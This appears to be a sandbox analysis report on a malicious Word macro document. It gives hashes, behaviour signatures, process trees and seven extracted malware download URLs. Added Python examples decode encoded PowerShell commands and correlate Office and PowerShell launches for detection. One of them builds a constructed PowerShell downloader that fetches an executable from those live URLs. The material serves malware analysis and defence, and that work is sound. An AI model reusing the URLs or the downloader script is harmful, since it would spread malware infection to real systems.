Analysis

  • max time kernel: 118s
  • max time network: 119s
  • platform: windows7_x64
  • resource: win7-20240508-en
  • resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted: 13-06-2024 23:31

General

  • Target: a71d78be09876fcbbebc701107433b43_JaffaCakes118.doc
  • Size: 125KB
  • MD5: a71d78be09876fcbbebc701107433b43
  • SHA1: c8cc5a47e49c0116b5a8434f4223b63ff1220b05
  • SHA256: d0b0c89fd70b604e0abda15a2af6e8d0fcef712db05d5b15705862e2dc1120f2
  • SHA512: d543554732070218cf1baf413db6542f844af76a9cbe82f0f7db39098f09ddce56ba4d4edcd423c300e7594a4474d589992a354005d4a4c5bf15f4bbee062f9d
  • SSDEEP: 1536:j+wLAAAAcAAAAAUmPxwMddylbvuNm9F9qqWa08l1rtTkbs:ZLAAAAcAAAAAUSxRYMv8l1pTkbs

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Source: URLs
  • exe.dropper: http://movewithketty.com/cgi-bin/LXr/
  • exe.dropper: http://pixnbeats.com/chanakua.org/6/
  • exe.dropper: http://trainingbodies.com/Reporting/YR/
  • exe.dropper: http://voxdream.com/wp-includes/0Oj/
  • exe.dropper: https://travcalls.com/blogs/E/
  • exe.dropper: http://aeropilates.cl/wp-content/rNM/
  • exe.dropper: http://hesa.co.id/_errorpages/1x/
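The exe.dropper URLs above are recovered by decoding the `-ENCOD` argument of the PowerShell launch listed under Processes: powershell.exe accepts any unambiguous, case-insensitive prefix of `-EncodedCommand` (`-e`, `-ec`, `-enc`, `-ENCOD`, ...), and the argument is base64 of UTF-16LE script text. The following is an added example, not code from the report or the sandbox; the real encoded payload is elided on this page, so the block builds a constructed stand-in whose script body (a `@`-joined URL list split at run time and tried in order) is an assumption, using only the seven URLs the report lists.

```python
import base64
import binascii
import re
from typing import List, Optional

# The seven exe.dropper URLs from the extracted config above. They are used
# only to build a constructed stand-in command line; the real -ENCOD payload
# is not shown on this page.
REPORTED_URLS = [
    "http://movewithketty.com/cgi-bin/LXr/",
    "http://pixnbeats.com/chanakua.org/6/",
    "http://trainingbodies.com/Reporting/YR/",
    "http://voxdream.com/wp-includes/0Oj/",
    "https://travcalls.com/blogs/E/",
    "http://aeropilates.cl/wp-content/rNM/",
    "http://hesa.co.id/_errorpages/1x/",
]

# A URL runs until whitespace, a quote, or a typical list/separator character.
# '@' is excluded because the constructed script joins its URLs on it.
URL_RE = re.compile(r"https?://[^\s'\"@<>()\[\]{},;|`]+")


def encode_command(script: str) -> str:
    """What powershell.exe expects after -EncodedCommand: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def build_constructed_sample() -> str:
    """Constructed command line in the shape of the report's 'POwersheLL -ENCOD <...>'.

    The script body is an assumption (URL list joined on '@', split at run
    time, each URL tried until one download succeeds); it was not recovered
    from this sample.
    """
    script = (
        "$u='" + "@".join(REPORTED_URLS) + "'.Split('@');"
        "foreach($x in $u){try{(New-Object Net.WebClient)"
        ".DownloadFile($x,$env:TEMP+'\\q.exe');break}catch{}}"
    )
    return "POwersheLL -ENCOD " + encode_command(script)


def is_encoded_command_flag(token: str) -> bool:
    """powershell.exe accepts the short forms -e and -ec plus any prefix of
    -EncodedCommand, case-insensitively; '-ENCOD' in the report is one such prefix."""
    if not token.startswith("-") or len(token) < 2:
        return False
    name = token[1:].lower()
    return name in ("e", "ec") or "encodedcommand".startswith(name)


def find_encoded_argument(cmdline: str) -> Optional[str]:
    """Return the base64 blob following the encoded-command flag, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_command_flag(tok):
            return tokens[i + 1]
    return None


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Decode the -EncodedCommand payload back to script text; None if absent or malformed."""
    blob = find_encoded_argument(cmdline)
    if blob is None:
        return None
    blob = blob.strip("'\"")
    blob += "=" * (-len(blob) % 4)  # tolerate stripped base64 padding
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def extract_dropper_urls(cmdline: str) -> List[str]:
    """Decoded script -> ordered, de-duplicated URL list (the report's exe.dropper entries)."""
    script = decode_encoded_powershell(cmdline)
    if script is None:
        return []
    seen, urls = set(), []
    for u in URL_RE.findall(script):
        if u not in seen:
            seen.add(u)
            urls.append(u)
    return urls


if __name__ == "__main__":
    sample = build_constructed_sample()
    for u in extract_dropper_urls(sample):
        print("exe.dropper", u)
```

Run against a real command line taken from process-creation telemetry, `extract_dropper_urls` gives the list to block at the proxy; `decode_encoded_powershell` returns `None` rather than raising when the argument is not valid base64 or not UTF-16LE, so it is safe to run over a whole day of PowerShell launches.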

Signatures

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a71d78be09876fcbbebc701107433b43_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2020
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
      PID:2416
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD …
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2876
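Note that POwersheLL.exe (PID 2876) is listed at depth 1, alongside WINWORD.EXE rather than beneath it; the report does not show which process launched it. A detection keyed purely on "PowerShell whose parent is an Office binary" therefore has nothing to fire on here. The block below is an added example, not part of the report: it contrasts that parent-child rule with a time-window correlation of Office start and encoded-PowerShell start on the same host. Images, PIDs and command lines are the report's; the timestamps, the PowerShell parent PID and the short base64 placeholder are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# powershell.exe accepts -ec and any prefix of -EncodedCommand (-e ... -EncodedCommand),
# case-insensitively; the report's "-ENCOD" is one such prefix.
_PREFIXES = ["ec"] + ["encodedcommand"[:i] for i in range(1, 15)]
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:" + "|".join(_PREFIXES) + r")(?=\s|$)", re.I)


@dataclass(frozen=True)
class ProcStart:
    ts: float       # seconds since first event; constructed, the report has no timestamps
    pid: int
    ppid: int
    image: str
    cmdline: str


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_encoded_powershell(ev: ProcStart) -> bool:
    return image_name(ev.image) in POWERSHELL_IMAGES and bool(ENCODED_FLAG.search(ev.cmdline))


def parent_child_rule(events: List[ProcStart]) -> List[Tuple[int, int]]:
    """Classic rule: encoded PowerShell whose direct parent is an Office process."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent and image_name(parent.image) in OFFICE_IMAGES and is_encoded_powershell(e):
            hits.append((parent.pid, e.pid))
    return hits


def window_rule(events: List[ProcStart], window_s: float = 120.0) -> List[Tuple[int, int, bool]]:
    """Correlate any Office start with an encoded-PowerShell start within window_s seconds,
    regardless of parent. Third field records whether the parent link was present too."""
    office = [e for e in events if image_name(e.image) in OFFICE_IMAGES]
    hits = []
    for e in events:
        if not is_encoded_powershell(e):
            continue
        for o in office:
            if o.ts <= e.ts <= o.ts + window_s:
                hits.append((o.pid, e.pid, e.ppid == o.pid))
    return hits


# Constructed event stream mirroring the report's process list. Timestamps and
# the parent PIDs 1000/1500 are assumptions; the base64 blob is a placeholder
# ($a='x' in UTF-16LE), not the sample's real payload.
SAMPLE_EVENTS = [
    ProcStart(0.0, 2020, 1000, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n '
              r'"C:\Users\Admin\AppData\Local\Temp\a71d78be09876fcbbebc701107433b43_JaffaCakes118.doc"'),
    ProcStart(3.0, 2416, 2020, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
    ProcStart(41.0, 2876, 1500, r"C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe",
              "POwersheLL -ENCOD JABhAD0AJwB4ACcA"),
]

if __name__ == "__main__":
    print("parent/child hits:", parent_child_rule(SAMPLE_EVENTS))
    print("window hits (office_pid, ps_pid, parent_linked):", window_rule(SAMPLE_EVENTS))
```

The window rule trades precision for recall: on a host where users legitimately run PowerShell shortly after opening Word it will need an allow-list, but it is the version that would have flagged this run.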

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
    Filesize: 20KB
    MD5: d36320ae6bb9c4fbe03a29a42817fe44
    SHA1: 37f6462754cf1b90cbdf278700ffe85b4ccce73d
    SHA256: 281e37cc20db63d719a7cb708ff0b8ce6a14d6ca67f89b106f0bd193d22c9165
    SHA512: 74b849d169344b54893eda2ace5c108296a6bc3b291e4fc35a8c9826687daf951cb20196f872fd8450f16a65f75e996e83b3d2068e3a0a0298dd9d494529dd6a

  • memory/2020-29-0x0000000005970000-0x0000000005A70000-memory.dmp, Filesize 1024KB
  • memory/2020-54-0x0000000005970000-0x0000000005A70000-memory.dmp, Filesize 1024KB
  • memory/2020-6-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-0-0x000000002F521000-0x000000002F522000-memory.dmp, Filesize 4KB
  • memory/2020-11-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-10-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-14-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-13-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-12-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-9-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-30-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-85-0x0000000070D1D000-0x0000000070D28000-memory.dmp, Filesize 44KB
  • memory/2020-25-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-40-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-39-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-38-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-37-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-33-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-32-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-31-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-8-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-7-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-84-0x000000005FFF0000-0x0000000060000000-memory.dmp, Filesize 64KB
  • memory/2020-21-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-20-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-18-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-17-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-16-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-15-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-56-0x0000000005970000-0x0000000005A70000-memory.dmp, Filesize 1024KB
  • memory/2020-55-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-2-0x0000000070D1D000-0x0000000070D28000-memory.dmp, Filesize 44KB
  • memory/2020-53-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-52-0x0000000005970000-0x0000000005A70000-memory.dmp, Filesize 1024KB
  • memory/2020-51-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-62-0x0000000070D1D000-0x0000000070D28000-memory.dmp, Filesize 44KB
  • memory/2020-63-0x0000000000840000-0x0000000000940000-memory.dmp, Filesize 1024KB
  • memory/2020-64-0x0000000005D40000-0x0000000005E40000-memory.dmp, Filesize 1024KB
  • memory/2020-65-0x0000000005970000-0x0000000005A70000-memory.dmp, Filesize 1024KB
  • memory/2020-66-0x0000000005970000-0x0000000005A70000-memory.dmp, Filesize 1024KB
  • memory/2020-67-0x0000000005970000-0x0000000005A70000-memory.dmp, Filesize 1024KB
  • memory/2020-1-0x000000005FFF0000-0x0000000060000000-memory.dmp, Filesize 64KB
  • memory/2876-49-0x000000001B890000-0x000000001BB72000-memory.dmp, Filesize 2.9MB
  • memory/2876-50-0x0000000001F70000-0x0000000001F78000-memory.dmp, Filesize 32KB